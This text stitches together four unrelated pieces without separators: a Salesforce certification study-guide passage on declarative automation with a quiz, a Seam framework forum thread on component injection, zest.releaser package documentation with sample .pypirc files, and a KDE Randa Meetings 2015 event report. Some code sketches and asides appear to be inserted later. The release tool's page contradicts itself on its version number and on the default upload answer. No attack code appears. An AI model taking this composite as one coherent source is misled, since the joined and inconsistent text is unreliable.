You can use filters to only pull values from specific child records. For example, let's say that we have a custom Invoice__c object that is related to the account as a Master-Detail relationship. In our Invoice__c object, we have an Amount field and a Status field. We could create a RUS field in the account that represents the total amount that is overdue, which is a calculation of the SUM operation of the Amount field on all related invoices, with a filter on the Status field that is equal to Overdue. Validation rules are used to make sure that the data entered in fields adheres to the standards you have specified for your business; for example, making sure that phone numbers always have the same format, or that a field cannot be left blank based on the input or value of another field. If a value does not meet your validation rules, then the user will not be able to save the record. A validation rule is made of a formula or expression to check the criteria and an error message, which will be shown to the user if the values do not meet your specified criteria. The formula evaluates the data in one or more fields, and then returns either true or false. Validation rules ensure data quality in your org. If the formula returns true, then the defined error message is displayed and the record cannot be saved. The formula can reference more than one field and can also be a cross-object formula. While setting the error message, you can decide to show it next to a certain field or on top of the page. Validation rules will run while performing operations through an API (through Data Loader, for example), on web-to-lead creations, and on web-to-case submissions.
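As a sketch of what such a rule looks like, the following error condition formula enforces a phone format of exactly 10 digits on the standard Phone field; the record is blocked whenever the formula evaluates to true (the 10-digit requirement itself is just an illustrative assumption):

```
/* Error condition formula: returns true (and blocks the save)
   when Phone is filled in but is not exactly 10 digits */
AND(
    NOT(ISBLANK(Phone)),
    NOT(REGEX(Phone, "[0-9]{10}"))
)
```

Because the rule only fires when the formula returns true, an empty phone number is still allowed here; a separate required-field setting or ISBLANK check would cover that case. Excluding a specific user or profile from the rule can be done by adding one more condition inside the AND(), such as comparing $Profile.Name against the profile used for data loads.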
So, make sure that you design your validation rules so that they will not interfere unintentionally with these functionalities. In some scenarios, you may need to disable the validation rules while you import or update data, and then reactivate the rules afterward. Alternatively, you may exclude a specific user or profile in the validation formula so that it doesn't execute when the operation is run as that specific user or as a user with that profile; this means that they can perform data loads without validation rules firing. WFRs are among the oldest and highest-performing automation tools. They help end users save time in their day-to-day activities. A WFR is a set of actions that need to be executed when a record is created or updated and meets specified criteria. WFRs can be split into two main components:

- Criteria: What must be true for the record in order for the WFR to fire and have its associated actions executed
- Actions: What to do when the record meets the defined criteria

WFRs can execute the following actions (either immediately or time-based):

- Sending an email alert
- Performing one or more field updates
- Sending an outbound message
- Creating a task
- Triggering a Lightning flow process

Consider the following screenshot:

Sometimes, you may want to create some kind of an approval process in which records need to be approved by one or multiple other users before moving further within your business process. A very common use case is to submit an opportunity for approval to a sales manager if a specific discount percentage or amount is exceeded. Well, approval processes are the tools that create these types of processes. They allow you to specify an object, the criteria (or record values) that need to be evaluated before a record must be submitted for approval or not, and who needs to give their approval.
After an approval or rejection, you can perform a number of automated actions, such as field updates or sending notifications. In approval processes, after submitting the record, the record is then locked. In this way, nothing can be changed until the data has been approved or rejected. The user who is submitting the data for approval can also have the option to recall the record, which takes the record back out of the approval process. Upon final approval or final rejection, the same actions as in WFRs can be executed, such as updating a field, sending an email, and more: In the day-to-day life of end users, a lot of repetitive work is done manually. You can minimize these manual actions (such as sending email notifications, assigning records to other users or queues, and performing record updates to certain stages and statuses) by creating automated actions through the Process Builder. The Process Builder is one of the most powerful tools that you can use to automate your business using a nice graphical interface. The Process Builder can be kicked off in the following three ways: - When a record is created or updated in Salesforce - When a platform event occurs on the Salesforce Platform - When another process invokes it Each process consists of nodes and actions, as follows: - In the nodes, you'll define the criteria on which a set of actions need to be executed. - The actions (immediate or scheduled, that is, time-based actions) need to be executed when a certain criteria node is being entered and evaluated (being true). Pay attention to the fact that only record-change processes support scheduled actions. With the Process Builder, you can perform the following actions: - Create records of any object type. - Update any related record; this is not limited to the record itself or its parent. - Use quick actions to create or update records or log calls. - Invoke a process from another process. - Launch a flow. - Send an email. - Post to Chatter. 
- Submit a record for approval.
- Call an Apex class.

The Process Builder also comes with an easy-to-read and easy-to-edit drag and drop graphical interface; this is why most people call it WFR on steroids: When it comes to flows, you might have heard of several different definitions or types. To clear up any confusion, the official terms are as follows:

- Lightning flow: This is the native platform feature that allows you to build, manage, and run processes
- Cloud Flow Designer: This is the graphical interface that is used to design and build your flows; this is done through clicks and drag and drop
- Flow: This is an actual chain of events, input captures, queries, and actions that will be executed to automate your specific business process when an event takes place in your Salesforce org or on an external system

In short, the Cloud Flow Designer is the tool that helps you create flows:

The Flow screen example

Every flow consists of three blocks, as follows:

- Elements (1): These are dragged onto the canvas; an element can represent a screen input, a query, or some kind of action (such as create record), a post to Chatter, and more.
- Connectors (2): These are used to define the order in which elements are executed. They form the path that elements must follow, and they tell the flow what elements must be executed next.
- Resources (3): These are pieces of storage in the memory of the flow that contain a specific value, such as values from fields or formulas. You can refer to and use these resources throughout your flow; for example, to look for an account's ID, store that ID in a variable resource with a name of your choice, and then later use that ID to update the account or to relate records to that account ID.

Additionally, Lightning flow is the only automation tool that can accept user input without the need to create a Visualforce page or Lightning component for it.
So, Lightning flow is an ideal tool for building guided interactions, such as call scripts, in which you guide users through a set of questions to ask a customer and then, depending on the responses, it performs a set of actions at the end of the flow. Additionally, Lightning flow is the only automation tool that is able to delete records. Salesforce has a very nice comparison chart of the different automation tools, which you should know by heart for the exam. You can keep checking for any updates to this chart at. Consider the following screenshot:

So far, we have learned how working on a multi-tenant platform requires your attention while developing your own custom applications. Additionally, we have learned what the MVC paradigm is, how Salesforce comes with some core standard objects, how you can create your own custom objects, and how you can leverage declarative tools to customize and automate your environment to support your business processes. In Chapter 2, Understanding Data Modeling and Management, we'll learn more about the Salesforce data model and how you can extend it. Additionally, we'll explore how to relate different objects to each other, how to visualize these different relationships, how you can import data into the platform, and how to export it. We'll be building our own basic international movie database in order to explore all of these concepts. But, first, let's check whether you are on the right track to becoming a certified Salesforce developer—I definitely hope so! You'll find all the answers to each chapter summary quiz at the end of this book (in the Appendix). Try to answer the questions first without looking at the answers:

- Your manager wants you to build a solution that deletes all open tasks related to an opportunity when the Opportunity stage is set to Closed Won. In what ways could you build out this solution?
Select two answers:

  - Write an Apex trigger that fires when the Opportunity Stage updates to Closed Won, queries all the related Tasks that have an Open status for that opportunity, and then deletes them.
  - Create a Process Builder that performs a delete action on all the related Children of the Task type with Status Open, when the Opportunity Stage is set to Closed Won.
  - Create a Process Builder that calls a Lightning flow whenever an Opportunity Stage reaches Closed Won. The flow then queries all Tasks related to the opportunity that kicked off the Process Builder with a status of Open, and deletes them.
  - Create a Process Builder that calls an Apex trigger whenever an Opportunity Stage reaches Closed Won. The trigger then queries all related Tasks with a status of Open for that opportunity and deletes them.

- Object B has a master-detail relationship to object A, so A is the parent of B. You want to display the value of the Status field from object A on the record of object B. How could you do this?

  - You create a formula field on object B and, in the formula, you reference the Status field from its related object A.
  - You create an Apex trigger on object B to copy over the value of the Status field from its related object A record.
  - You create a RUS field on object B, pulling in the Status from object A.
  - You use the Process Builder to fire off on object B to copy over the value of the Status field from its related object A record.

- A business user would like you to send a notification to the case owner's manager, and to post this on Chatter, whenever a case is put in the Closed status. What's the best tool to use?
  - WFRs
  - Apex trigger
  - The Process Builder
  - Lightning flow

- A cross-object formula field can do one of the following:

  - Reference fields from parent objects that have a Master-Detail relationship
  - Reference fields from parent objects related through a lookup relationship only
  - Reference fields from parent objects related through either a Master-Detail or a lookup relationship
  - Reference fields from the same record only

- Your company is in need of a recruitment application for its HR department, including jobs, job postings, applicants, and more. How would you go about this?

  - You start by drawing the data model, create the objects, test them, validate them, and perform a RUS calculation
  - You start by searching the AppExchange
  - You advise HR management that this is not something that should reside in Salesforce
  - You scratch your head because you have no clue how to start providing a solution for this requirement

- What are some implications of a multi-tenant environment when it comes to Salesforce?

  - Resources are added to the instance whenever needed, so you should not worry about resource consumption
  - Multi-tenant means that your org gets its own instance with all its resources dedicated to your org
  - You should avoid using Salesforce at peak times as it is slower than usual, because everybody is using it at that time
  - There are governor limits imposed by Salesforce on each org to prevent them consuming all of the instance's resources

- In a multi-tenant environment, which of these statements is true?

  - Your org shares a Salesforce instance with thousands of other orgs
  - Your org shares a Salesforce instance with no more than 100 other orgs
  - Your org has its own Salesforce instance
  - All Salesforce orgs use the same Salesforce instance

- What's special about a formula field?
  - It is calculated once every 24 hours
  - It is calculated once every hour
  - It is calculated only when you write the record into the database
  - It is calculated every time you read the record in question

- How is a managed package built?

  - Through your Salesforce org's sandbox
  - Through the enterprise edition of the Salesforce org
  - Through the developer edition of the Salesforce org
  - Through a Salesforce developer edition's sandbox

- Your company asks you to create a process that automates holiday requests. There should be two levels of acceptance before the holiday request is granted - first, by the direct manager of the requestor, and then by the HR manager. How would you do this?

  - Build a flow using Lightning flow
  - Build rules by using WFRs to streamline the process
  - Build a process by using the Process Builder
  - Build this process by using the approval process
Seam & Delegation
J B Apr 5, 2011 3:07 AM

I'm just playing with Seam and trying to get a feel for it, but I've hit a stumbling block. I'm playing around with pagination and I don't like having to dump all the pagination variables into every component that needs pagination (maybe I don't need to, but that's what the examples I've seen do). Here is my setup:

@Name("statusManager")
@Scope(ScopeType.CONVERSATION)
public class StatusManager implements Serializable, PagingListener {

    @Out
    private PagingHandler pagingHandler = PagingHandler.getInstance(this);

    public void searchByState() {
        Query query = entityManager.createQuery(queryStr);
        dataModel = QueryHelper.getResultList(query, pagingHandler);
    }

    @Override
    public String changePage() {
        searchByState();
        return null;
    }
}

@Name("pagingHandler")
@Scope(ScopeType.CONVERSATION)
public class PagingHandler {

    private int pageNo = 1;
    private int pageSize = 5;
    private boolean morePagesAvailable = true;
    private PagingListener listener = null;
    ......

On the front end I then have just this:

<custom:pager

Now the problem with the above is the callback: when "next" or "previous" is called, it calls the paging handler instance, which calls StatusManager.changePage, but the entity manager is null when changePage is called and it bombs out (obviously because Seam hasn't injected the entityManager), because the request has gone to the paging handler instance. I'm completely new to Seam and have played around with setting the paging handler instance to be @Out and also made it a component, but to no avail. (This is where I feel I'm going wrong, incorrectly annotating, but I'm just hacking at the moment to get it to work; I should read up more, but hey ;) )

Is it possible to do what I want to do here?

Appreciate any help or pointers in the right direction,
JB

1.
Re: Seam & Delegation
Leo van den berg Apr 5, 2011 3:33 AM (in response to J B)

Hi, I would be happy to help you, but I would recommend that you first get a basic idea of the workings of Seam before you start playing and/or hacking. The Seam component EntityQuery has excellent built-in support for pagination, so under normal circumstances there is no need whatsoever to build such functionality yourself. Seam MUST handle the management of components, so the moment you create an instance with new, or with a factory method, Seam doesn't manage that instance, and in- and outjection won't work.

- Get the full docs and examples of Seam
- Buy the Seam in Action book

Leo

2. Re: Seam & Delegation
J B Apr 5, 2011 8:10 AM (in response to J B)

Hi Leo,

I'm more interested in the interaction of the components with each other. Don't get hung up on the fact that it is pagination; I'm more interested in how the callback works, or would work, in Seam. I realise from your comments (thanks) that this won't work:

@Out
private PagingHandler pagingHandler = PagingHandler.getInstance(this);

As you said, Seam must manage the components, so it should possibly look something like this:

@In
@Out
private PagingHandler pagingHandler;

What I'm stuck on is how the injection of the PagingListener into PagingHandler from Seam would work. I don't see it in the docs. Is the above even possible in Seam?

Cheers,
JB

3. Re: Seam & Delegation
Leo van den berg Apr 5, 2011 8:19 AM (in response to J B)

Hi, you can create components statically in Seam, more or less like Spring does. You define a component in components.xml and provide its name, the class it should use and (optionally) a scope. Instance variables can be set as tags inside the component tag. If you want Seam to handle the creation with annotations, you need the In annotation with the attribute create, @In(create=true), which takes care of creating an instance. You can also put an AutoCreate annotation on a component.

Leo
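For readers landing on this thread later: Leo's static-definition approach might look something like the sketch below. This is a hypothetical components.xml fragment — the package name and the pageSize property are made-up illustrations, not taken from the thread — showing a component Seam would then manage itself:

```xml
<components xmlns="http://jboss.com/products/seam/components">

    <!-- Statically define the paging handler so Seam manages its lifecycle -->
    <component name="pagingHandler"
               class="com.example.paging.PagingHandler"
               scope="conversation">
        <!-- Instance variables can be set as nested property tags -->
        <property name="pageSize">5</property>
    </component>

</components>
```

With the component defined this way (or annotated with @AutoCreate), an @In(create=true) private PagingHandler pagingHandler; field lets Seam create and inject the instance instead of calling getInstance() yourself, so injection into it works as expected.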
zest.releaser 3.30

Software releasing made easy and repeatable

Package releasing made easy

zest.releaser is a collection of command-line programs to help you automate the task of releasing a software project. It's particularly helpful with Python package projects, but it can also be used for non-Python projects. For example, it's used to tag buildouts - a project only needs a version.txt file to be used with zest.releaser.

It will help you to automate:

- Updating the version number. The version number can either be in setup.py or version.txt. For example, 0.3.dev0 (current) to 0.3 (release) to 0.4.dev0 (new development version).
- Updating the history/changes file. It logs the release date on release and adds a new section for the upcoming changes (new development version).
- Tagging the release. It creates a tag in your version control system named after the released version number.
- Uploading a source release to PyPI. It will only do this if the package is already registered there (else it will ask, defaulting to 'no'); the Zest Releaser is careful not to publish your private projects!

It can also check out the tag in a temporary directory in case you need to modify it.

Contents

- Package releasing made easy
- Details
- Entrypoints documentation
- To do
- Credits
- Changelog for zest.releaser

Installation

Getting a good installation consists of two steps: getting the zest.releaser commands, and setting up your environment so you can upload releases to pypi (if you want that).

Get the zest.releaser commands

Just a simple pip install zest.releaser or easy_install zest.releaser is enough. Alternatively, buildout users can install zest.releaser as part of a specific project's buildout, by having a buildout configuration such as:

[buildout]
parts = releaser

[releaser]
recipe = zc.recipe.egg
eggs = zest.releaser

Prepare for pypi distribution

Of course you must have a version control system installed.
zest.releaser currently supports:

- Subversion (svn)
- Mercurial (hg)
- Git (git)
- Bazaar (bzr)

Others could be added if there are volunteers.

When the (full)release command tries to upload your package to a pypi server, zest.releaser basically just executes the command python setup.py register sdist upload. The python here is the same python that was used to install zest.releaser. If that command would fail when you tried it manually (for example because you have not configured a .pypirc file yet), then zest.releaser does not magically make it work. This means that you may need to have some extra python packages installed:

- setuptools or distribute (when using subversion 1.5 or higher you need setuptools 0.6c11 or higher or any distribute version)
- collective.dist (when using python2.4, depending on your ~/.pypirc file)

The setuptools plugins are mostly there so that you do not miss files in the generated sdist that is uploaded to pypi. For more info, see the section on Uploading to pypi server(s). In general, if you are missing files in the uploaded package, the best fix is to put a proper MANIFEST.in file next to your setup.py. See zest.pocompile for an example.

Running

zest.releaser gives you four commands to help in releasing python packages. They must be run in a version controlled checkout. The commands are:

- prerelease: asks you for a version number (defaults to the current version minus a 'dev' or so), updates the setup.py or version.txt and the HISTORY.txt/CHANGES.txt file, and offers to commit those changes.
- release: tags the release with the version number from setup.py or version.txt, optionally makes a checkout of the tag in a temporary directory, and offers to upload a source release to PyPI.
- postrelease: asks you for a new development version number (such as 0.4.dev0), updates setup.py or version.txt, adds a fresh section to the HISTORY.txt/CHANGES.txt file, and offers to commit those changes.
- fullrelease: runs prerelease, release and postrelease in one go.

Details

Current assumptions:

There's a version.txt or setup.py in your project. The version.txt has a single line with the version number (newline optional). The setup.py should have a single version = '0.3' line somewhere. You can also have it in the actual setup() call, on its own line still, as `` version = '0.3',``. Indentation and the comma are preserved.
If you need something special, you can always do a version=version and put the actual version statement in a zest.releaser-friendly format near the top of the file. Reading (in Plone products) a version.txt into setup.py works great, too.

The history file can be either HISTORY.txt or CHANGES.txt. It also supports the current zopeskel style with 0.3 - unreleased.

If using Python 2.4 you don't want to have tar.gz eggs due to an obscure bug in Python 2.4.

Development notes, bug tracker

The source code can be found on github. If you are going to do a fix or want to run the tests, please see the DEVELOPERS.txt file in the root of the package. Bugs can be reported on the bug tracker.

Note that there are alternative release scripts available, for instance one which installs itself as a setuptools command ("python setup.py release"), so it "only" works with setuptools projects.

Uploading to pypi server(s)

Like noted earlier, for safety reasons zest.releaser will only offer to upload your package to PyPI when the package is already registered there. If this is not the case yet, you can go to the directory where zest.releaser put the checkout (or make a fresh checkout yourself). Then, with the python version of your choice, do:

python setup.py register sdist upload

For this to work you will need a .pypirc file in your home directory that has your pypi login credentials, like this:

[server-login]
username:maurits
password:secret

Since python 2.6, or in earlier python versions with collective.dist, you can specify multiple indexes for uploading your package in .pypirc:

[distutils]
index-servers =
    pypi
    local

[pypi]
# pypi.python.org
username:maurits
password:secret

[local]
repository:
username:maurits
password:secret
# You may need to specify the realm, which is the domain the
# server sends back when you do a challenge:
#realm:Zope

See the distutils documentation for more info. When all this is configured correctly, zest.releaser will first register and then upload your package.
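The multi-index .pypirc above is plain INI syntax. As a quick sanity check — this helper is purely illustrative and not part of zest.releaser, and it uses Python 3's configparser, which postdates this document — you can parse such a file and confirm which index servers are defined:

```python
import configparser
from io import StringIO

# A hypothetical multi-index ~/.pypirc, mirroring the structure shown above:
PYPIRC = """\
[distutils]
index-servers =
    pypi
    local

[pypi]
username: maurits
password: secret

[local]
repository: https://example.com/dev/pypi
username: maurits
password: secret
"""

parser = configparser.ConfigParser()
parser.read_file(StringIO(PYPIRC))

# Indented lines under "index-servers =" are INI value continuations,
# so splitting on whitespace yields the server names:
servers = parser.get('distutils', 'index-servers').split()
print(servers)  # -> ['pypi', 'local']
```

Each name in index-servers must have a matching section with credentials, which is exactly what zest.releaser (via distutils) relies on when offering upload targets.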
Some people will hardly ever want to do a release on PyPI but in 99 out of 100 cases only want to create a tag. They won't like the default answer of 'yes'.

Entrypoints documentation

Warning: entry points were added in 3.0. I'm reserving the right to make backwards-incompatible changes to the entry point mechanism in the next couple of releases. It is a major new piece of functionality for zest.releaser and getting all the details right at the first attempt isn't guaranteed.

A zest.releaser entrypoint gets passed a data dictionary and that's about it. You can do tasks like generating documentation, or downloading external files you don't want to store in your repository but that you do want to have included in your egg.

Every release step (prerelease, release and postrelease) has three points where you can hook in an entry point:

- before: Only the workingdir and name are available in the data dictionary; nothing has happened yet.
- middle: All data dictionary items are available and some questions (like the new version number) have been asked. No filesystem changes have been made yet.
- after: The action has happened; everything has been written to disk or uploaded to pypi or whatever.

For the release step it made sense to create one extra entry point:

- after_checkout: The middle entry point has been handled, the tag has been made, a checkout of that tag has been made and we are now in that checkout directory. Of course, when the user chooses not to do a checkout, this entry point never triggers.

Note that an entry point can be specific to one package (usually the package that you are now releasing) or generic for all packages. An example of a generic one is gocept.zestreleaser.customupload, which offers to upload the generated distribution to a chosen destination (like a server for internal company use).
If your entry point is specific to the current package only, you should add an extra check to make sure it is not run while releasing other packages; something like this should do the trick:

def my_entry_point(data):
    if data['name'] != 'my.package':
        return
    ...

Entry point specification

Entry points are registered in your package's setup.py. See the setup.py of zest.releaser itself for some real world examples. You'll have to make sure that the zest.releaser scripts know about your entry points, for instance by placing your egg (with entry point) in the same zc.recipe.egg section in your buildout as where you placed zest.releaser. Or, if you installed zest.releaser globally, your egg-with-entrypoint has to be globally installed, too.

Prerelease data dict items

- commit_msg - Message template used when committing
- history_file - Filename of history/changelog file (when found)
- history_header - Header template used for 1st history header
- history_lines - List with all history file lines (when found)
- name - Name of the project being released
- new_version - New version (so 1.0 instead of 1.0dev)
- original_version - Version before prereleasing (e.g. 1.0dev)
- today - Date string used in history header
- workingdir - Original working directory

Release data dict items

- name - Name of the project being released
- tag_already_exists - Internal detail, don't touch this :-)
- tagdir - Directory where the tag checkout is placed (if a tag checkout has been made)
- version - Version we're releasing
- workingdir - Original working directory

Postrelease data dict items

- commit_msg - Message template used when committing
- dev_version - New development version with dev marker (so 1.1.dev0)
- dev_version_template - Template for dev version number
- history_header - Header template used for 1st history header
- name - Name of the project being released
- new_version - New development version (so 1.1)
- nothing_changed_yet - First line in new changelog section
- workingdir - Original working directory

To do

- Add some more tests (test coverage is at 95%, btw).
- Add hg support for lasttagdiff.

Credits

- Reinout van Rees (The Health Agency)

Changelog for zest.releaser

3.22 (2011-05-05)

- Allow specifying a tag on the command line when using lasttaglog or lasttagdiff, to show the log or diff since that tag instead of the latest. Useful when you are on a branch and the last tag was from trunk. [maurits]

3.21 (2011-04-20)

- Added lasttaglog command that lists the log since the last tag. [maurits]
- Fix Mercurial (hg) support, as spreaded_internal should be set to False (as happens with git). [erico_andrei]
- Accept a twiggle (or whatever '~' is called) when searching for headers in a changelog; seen in some packages (at least zopeskel.dexterity). [maurits]

3.20 (2011-01-25)

- Also allowing CHANGES.rst and CHANGES.markdown in addition to CHANGES.txt.

3.19 (2011-01-24)

- No longer refuse to register and upload a package on pypi if it is not there yet, forcing people to do this manually the first time. Instead, we ask the question and simply have 'No' as the default answer. If you specify an answer, we require exactly typing 'yes' or 'no'.
The idea is still to avoid making it too easy to release an internal package on pypi by accident. [maurits]

3.18 (2010-12-08)

- Added the --non-interactive option to the svn diff command used in lasttagdiff. This makes it usable in cronjobs and post-commit hooks.

3.17 (2010-11-17)

- When the package that is being released has neither a setup.py nor a setup.cfg, use No as the default answer for creating a checkout of the tag. [maurits]

3.16 (2010-11-15)

- For (pypi) output, also show the first few lines instead of only the last few. [maurits]
- See if pypirc or setup.cfg has a [zest.releaser] section with option release = yes/no. During the release stage, this influences the default answer when asked if you want to make a checkout of the tag. The default when not set is 'yes'. You may want to set this to 'no' if most of the time you only make releases of internal packages for customers and only need the tag. [maurits]
- Specify bazaar (bzr) tag numbers using the 'tag' revision specifier (like 'tag:0.1') instead of only the tag number (0.1) to add compatibility with earlier bzr versions (tested with 2.0.2). [maurits]

For older changes see HISTORY.txt in the docs directory.

Your entry point gets a data dictionary; the items you can find in it are documented in the Entrypoints documentation section above.
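To make the data-dictionary mechanics concrete, here is a minimal sketch of a hypothetical prerelease 'middle' hook. The function name and its refusal policy are made up for illustration; only the dictionary keys (name, new_version, history_lines) come from the documented lists above:

```python
def refuse_placeholder_changelog(data):
    """Hypothetical prerelease 'middle' hook: abort the release when the
    changelog still contains an untouched placeholder line."""
    # Only act on our own package, as recommended in the entrypoint docs.
    if data.get('name') != 'my.package':
        return
    for line in data.get('history_lines') or []:
        if 'nothing changed yet' in line.lower():
            raise RuntimeError(
                'Refusing to release %s %s: changelog was never filled in.'
                % (data['name'], data.get('new_version')))

# A simulated data dict, shaped like what zest.releaser passes at 'middle':
data = {
    'name': 'my.package',
    'new_version': '1.0',
    'history_lines': ['1.0 (unreleased)', '----------------', '- Fixed a bug.'],
}
refuse_placeholder_changelog(data)  # passes silently: changelog has real content
```

Registered under the right entry point group in setup.py, such a hook runs after the version questions are answered but before any files are changed, which is exactly what the 'middle' stage is for.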
This led to this year's lovely group picture:

All participants (including staff) at the Randa Meetings 2015

First day - Day of arrival

After arrival, people were shown their rooms so they could place their luggage and, if needed, recover a bit from the journey. As the arrivals were spread out over the whole day, not a lot of work and collaboration happened yet. It was mostly about meeting good old friends, making new friends and putting faces to nicknames. And of course most people needed some new energy, and thus food and drinks, after their long journeys.

Second day - Monday

On the second day most of the participants had arrived and had enough sleep, so they were ready for some work. However, most of the second day was spent on getting to know each other and talking with the various different groups:

- digiKam - professional photo management
- KDE Connect - connect with your Android devices
- Multimedia - including Amarok and Kdenlive
- PIM - the Kontact Suite
- QMLweb - QML in the web browser
- And the biggest group: Touch&Mobile - to bring Touch to KDE

And, in the afternoon, listening to presentations from various people. The videos of these presentations are now available. During that time we also had our first local guests: a teacher and his students from a local vocational school visited us to get an overview of Free and Open Source Software and the KDE community, and of what they would be doing in the Swiss mountains during the week.

Tuesday to Friday - Work of various groups

All the above mentioned groups worked on different ideas and projects, but in the end the big topic and motto of 2015 was "Bring Touch to KDE". And although most of the participants of the Randa Meetings started their work even before the meetings, thought about the topics during their journeys and started with their work as soon as they met the first other participants on their paths to Randa, the main working time of the KDE Tech Summit was the time from Tuesday to Friday.
digiKam

Gilles Caulier worked mostly on the KIPI-plugins port to Qt5, reducing dependencies where possible to improve portability and reduce complicated code. He has backported the MetadataEdit and GPSSync tools to the digiKam core.

Marcel Wiesweg concentrated on isolating and fixing a few performance-critical and/or critically annoying bugs that had shown up in the KF5 port. A large group of these turned out to be due to Qt's filter model dynamicSortFilter property being turned on per default in Qt5 (it is off in Qt4). With some more optimizations in the tag filter code, all models and views seemed to be performing very well again. Another big cleanup was needed for the (tag) completion code, with Qt5 providing the QCompleter API and the old kdelibs API gone.

Shourya Singh Gupta worked on KIPI-plugins as well. He mostly worked towards refactoring the remaining plugins using common classes created during GSoC 2015 and completing the KF5/Qt5 porting of KIPI-plugins. He also fixed dead plugins like Image Shack, removed dead UI components from plugins, made a new common KPLoginDialog class to support factorization of the plugins' login dialogs, and factorized Yandex Fotki's and Image Shack's login dialogs using KPLoginDialog.

The digiKam Team At Work Late At Night

Veaceslav Munteanu worked on further improvements to the metadatahub. Now the metadatahub user interface can support more than tags, comments and rating: adding a new category can be done very easily by setting default values, with zero changes in the user interface. Saving and retrieving namespace data from the config was also simplified. Besides the metadatahub improvements, private linking to KIPI-plugins was added, and hardcoded icon paths were removed from the digiKam source code.

Alexander Potashev took the last steps in the long process of porting KIPI-plugins to pure Qt5/KF5. As a result, all the plugins to be released with kipi-plugins-5.0.0 are now free of the kdelibs4support dependency.
During the rest of the time he was thinking over and discussing possibilities to switch KIPI-plugins to a more generic interface, to make them usable by a wider range of applications, such as Kamoso, KMail and Blogilo. But this work is still yet to be done. And together, the united digiKam team worked on the next big 5.0.0 version, anticipated for April 2016.

KDE Connect

As the software that connects your KDE Plasma Desktop with your Android devices (and in the future possibly other mobile operating systems), the KDE Connect team worked on their first KF5-based release as well. During the Meetings in Randa they achieved a new Android Material design and reviewed their new security infrastructure based on SSL and encryption. Another great piece of integration work was the mating of KDE Connect with KDE Telepathy, which enables you to answer your SMS or texting on your desktop. Please take a look and test the first new release.

Multimedia

On the multimedia side we had the yearly sprint on Amarok bug triaging, with Myriam pushing out a beta release of the current state, the last Qt4-based version. There was some work as well on porting Amarok to Qt5 and KF5, or at least some coordination work. Please get in contact if you can lend a helping hand to finish this port.

The Kdenlive team - our great non-linear video editor - began with a bug fix day, just before the Applications 15.08.1 tagging, so as to get a release as solid as possible. Then they turned to more social topics, as people in a great position to help them were present. The Visual Design Group (VDG) people helped them to define their vision statement, and then led a UI usability review with a video editor who was new to Kdenlive.

Kdenlive In A UI Discussion (and some visiting kids testing GCompris)

Experienced Qt hackers helped them to investigate an old, complex bug; packagers introduced them to the way of properly preparing binaries.
The Kdenlive team mentioned as well that they were interested in the sprint organization BoF (we hope to blog about this soon), in order to have small gatherings more regularly. During the last days Vincent and Jean-Baptiste had the pleasure of breaking things and adding new features:

- Saving only parts of the timeline, as a preparation for cross-project copy and paste or sub-sequence creation
- Automatic handling of transparent clips
- Reflections on crossfades on the same track

All in all, the Kdenlive team dedicated their time to intensive work and gained a lot of motivation from it, and several of the ideas that came out of it are currently being implemented or are being prepared for the next 15.12 release "that will be awesome thanks to Randa!"

PIM - Personal Information Management

The PIM group used the Randa Meetings for what they are best at: real-time face-to-face discussions. The first few days were really mostly spent on talking and finding a common ground to build on. Towards the middle of the week this base was found and they could start to discuss, plan and design new aspects of Akonadi Next and Kontact Quick.

QMLweb

The QMLweb team found their way to Randa for the second or even third time, but the team was never as big as this year (although, with 4 people, it is still relatively small). And they worked on a big restructuring too. You can listen to more about it in their introduction video from Monday. Towards the end of the Meetings they started to implement their ideas and plans, so we can look forward to blog posts about their progress in the time after Randa.

Touch&Mobile - Bring Touch to KDE

By far the biggest and still most heterogeneous group worked on our main topic: to bring touch capabilities to more KDE software. Of general help for all the groups was the Visual Design Group (VDG), with their expertise in design, usability and user experiences.
The icon guys Andreas and Uri talked with the different projects about their needs for new and better icons, and provided much help and insight into the process of icon creation. Heiko and Jens were part of several discussions regarding user interface design and helped different groups to improve their first impression on new users.

Scarlett and her team worked hard on a revamp of our powerful and badly needed continuous integration (CI) system. This revamp is necessary to bring the CI system, and thus our software, to major platforms such as MS Windows and Apple's Mac OS X. Another goal with at least as much importance is the coverage of Android and maybe, in the future, even Windows Phone or iOS. Emmanuel helped a lot to start the work on Docker integration.

Several of the KDE Edu projects were part of these meetings too, and you can witness a lot of porting work and thus improvements for future mobile or touch friendly versions of this software. One particular group was the Marble hackers, who worked on a vector-based display of the OpenStreetMap data - with a lot of success, and even 3D views, as can be seen in Dennis' blog post "Vector Tiling in Marble Maps @Randa". Marble Maps is a real KDE Android application, and just some days or weeks later Torsten announced that they now ship the oldest existing historic globe (on Android too). Other educational applications that were ported are Kalzium - the Periodic Table of Elements - and KTurtle - an Educational Programming Environment.

GCompris - Live User Testing

Bruno of GCompris fame mentioned: "GCompris had a nice and productive Randa Meetings this year. We completed two new activities, one named 'melody' where the children must memorize and reproduce a suite of notes played on a xylophone. The second one, created by Holger, is based on the physics engine Box2D and uses the mobile sensors to let the children move a ball by moving the tablet. This is a small step towards the completion of the port of GCompris.
So far we have ported 116 of the 140 activities of the GTK+ version. If this year is as productive as we have been so far, we will be in time to make a 'port complete' party for Randa next year."

Additionally, the GCompris team told us a bit about their experience of working with and porting to iOS.

The application that probably got the most work on the UI during the time in Randa was Artikulate - the Pronunciation Trainer. Andreas worked hard, in cooperation with different people and teams, to reach his highly set goals.

Dolphin gained ownCloud integration. Using KDE Applications 15.12 and ownCloud client 2.1, you will be able to see overlay icons within Dolphin and have an action to share files from the desktop.

Another, and by far not the least important, project that was worked on in Randa is an easily available Android Build Environment, for working on new KDE Android applications and porting old KDE applications. The group wrote good documentation and prepared a Docker image to allow people to set up their build environment with one command. They even started with testing and work on KDE Frameworks and their availability on Android.

And last but not least, the Calligra team with Friedrich and Leinir worked on further porting and integration of the Gemini infrastructure.

Thursday - Trip to Zermatt and Raclette

On Thursday two special events took place. In the afternoon a trip to Zermatt, a rather famous Swiss mountain town only a couple of kilometers from Randa, was organized. A couple of local taxi buses drove people up to Zermatt, where Mario showed them around and people were able to buy various souvenirs and Swiss chocolate. Afterwards a hike back to Randa was planned, roughly 10 kilometers down through forests and over meadows, following the river Vispa back to the house. This trip was optional, so a couple of people decided to rather stay in Randa and get more work done.
Also, for people not used to hiking or who didn't bring decent shoes along, it might have been a bit harsh, but in the end everybody enjoyed the trip and quite a lot of pictures were taken. It was another good opportunity to discuss KDE topics across groups and in some fresh air. Every other day a smaller walk around Randa was organized, or the different groups found a path themselves.

Standing In Line For The Raclette

